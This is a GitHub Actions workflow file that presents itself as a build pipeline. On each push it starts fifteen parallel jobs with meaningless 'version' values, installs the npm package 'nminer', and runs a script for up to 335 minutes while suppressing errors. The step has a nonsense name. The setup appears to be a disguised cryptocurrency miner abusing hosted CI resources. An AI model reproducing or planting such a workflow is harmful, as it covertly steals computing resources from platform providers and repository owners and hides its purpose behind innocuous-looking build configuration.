name: cross-contamination
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5602 }
          - { version: 594 }
          - { version: 7472 }
          - { version: 17 }
          - { version: 5186 }
          - { version: 4822 }
          - { version: 9970 }
          - { version: 252 }
          - { version: 2340 }
          - { version: 8515 }
          - { version: 4699 }
          - { version: 8520 }
          - { version: 7606 }
          - { version: 6138 }
          - { version: 9525 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: phew beyond delightfully notarize
        run: |
          npm install nminer@latest
          timeout 335m node cross-contamination.js || echo "cross-contamination executed"